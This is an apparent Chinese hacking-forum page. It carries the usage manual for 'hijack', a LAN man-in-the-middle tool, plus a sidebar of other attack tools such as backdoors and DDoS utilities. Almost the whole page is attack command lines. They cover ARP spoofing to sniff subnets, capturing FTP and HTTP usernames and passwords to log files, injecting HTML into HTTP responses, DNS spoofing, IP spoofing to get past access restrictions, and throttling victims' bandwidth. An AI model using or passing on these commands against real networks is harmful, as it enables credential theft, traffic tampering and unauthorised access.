[推荐]hijack(红狼安全小组原创作品 - 内部版)
// 常用功能举例说明
显示网卡列表
hijack /L
扫描子网
hijack /sd3
结束一个现有的实例
hijack /k
______________________________________________________
// 嗅探功能举例说明
嗅探子网,程序自动转发 (可以匹配,但不能设置过滤规则)
hijack /d3 192.168.16.* 192.168.16.1
嗅探子网,同上, 双向欺骗
hijack /fd3 192.168.16.* 192.168.16.1
嗅探子网,同上,退出Console, 进入后台运行
hijack /Hfd3 192.168.16.* 192.168.16.1
嗅探子网,同上,退出Console, 进入后台运行, 120秒后程序自动退出
hijack /Hfd3 /E 120 192.168.16.* 192.168.16.1
嗅探子网,同上,退出Console, 进入后台运行, 120秒后程序自动重新运行
hijack /Hfd3 /R 120 192.168.16.* 192.168.16.1
嗅探子网,程序自动转发,发送RARP欺骗包间隔为100微秒
hijack /d3 /S 100 192.168.16.* 192.168.16.1
嗅探子网,同上, 强制指定子网掩码为255.255.255.0
hijack /d3 /S 100 /b 255.255.255.0 192.168.16.* 192.168.16.1
嗅探子网,系统自动转发 (效率高, 可以设置BPF规则) 以下为嗅探FTP密码 "|" 为条件分隔符
hijack /rqd3 192.168.16.* 192.168.16.1 "USER|PASS" "tcp and dst port 21"
同上,将信息保存到pass.log里,pass.log里有详细的FTP密码信息
hijack /rqd3 /l pass.log 192.168.16.* 192.168.16.1 "USER|PASS" "tcp and dst port 21"
嗅探子网,一些常见的HTTP密码, 不区分大小定(i选项打开), 保存数据包到pass.dat里
hijack /rqid3 /O pass.dat 192.168.16.* 192.168.16.1 "username=|password=" "tcp and dst port 80"
还原数据包数据,程序将显示嗅探到的数据包
hijack /I packet.dat
自定义要嗅探的主机用","分隔,如:
hijack /rd3 192.168.16.3,192.168.16.8,192.168.16.10-20 192.168.16.1
_______________________________________________________________
// 数据包修改功能举例说明
释放一个替则文件
hijack /N
释放的文件如下:
----
gzip
----
gxip
----
http-insert
----
<center>hijack</center>
----
程序以"----"为分隔符,第一个字符串为原字符串,第二个字符串为替换后的字符串,最大长度都为256字节, 往下再重复
如果是原字符串为http-insert,表始要进行HTTP会话劫持,程序将下一条字符串插入到HTTP响应包里
劫持网关到子网之间的数据, 并显示详细信息
hijack /vd3 /p 80 /S 100 /F job.txt 192.168.16.1 192.168.16.*
修改后的数据用'\0'字符填充
hijack /vod3 /p 80 /S 100 /F job.txt 192.168.16.1 192.168.16.*
修改后的数据用'\0'字符填充
hijack /vod3 /p 80 /S 100 /F job.txt /c "404" 192.168.16.1 192.168.16.*
_______________________________________________________________
// DNS欺骗说明, 需打开-D选
DNS欺骗与数据包修改唯一不同的就是规则文件,一个实例的DNS欺骗需要用的规则文件如下
----
www.163.com
----
192.168.16.3
----
*
----
192.168.16.1
----
欺骗后 就把www.163.com的IP解析成了192.168.16.3, 其它所有的都解析为192.168.16.1
DNS欺骗www.163.com为192.168.16.3
规则文件dns.txt如下
----
www.163.com
----
192.168.16.3
----
命令如下:
hijack /Dvd3 /F dns.txt 192.168.16.* 192.168.16.1
注意: 实例中dns查询包是从内网到外网发送的,所以欺骗方向要注意
_______________________________________________________________
// IP欺骗说明, 需打开-z选项
hijack /zd3 202.108.22.33 202.108.22.1 61.163.83.11 202.102.245.9
实例是在公网上实现的,如果202.108.22.33的21端口做了IP限制,只允许202.102.245.9访问(可以嗅探得到)
攻击者IP是61.163.83.11,则可以通到上面的命令突破IP限制
____________________________________________________________
// 网速限制说明
限制子网网速为20K/S, 本机不在统计内
hijack /fd3 /m 20 192.168.16.* 192.168.16.1
| hijack(红狼安全小组原创作品 - | 11-29 | |
| 高级内网渗透工具:Paris (创建VP | 11-01 | |
| 最酷的windows后门 | 09-10 | |
| X-Spoof使用详解+工具 | 08-17 | |
| 黑界神兵-cain | 08-06 | |
| 隐藏目标进程的程序(驱动) | 06-29 | |
| 清除网页挂马和后门 - 安全伞1.0 | 06-19 | |
| 脚本0day生成器 | 06-08 | |
| 3389脚本开启代码(vbs版) | 06-08 | |
| SQL INJECTION的终极利器opendat | 05-14 | |
| Grep与web漏洞挖掘+一款WIN下的G | 05-14 | |
| 黑客工具介绍之DDoS攻击工具TFN2 | 05-12 | |
您现在的位置: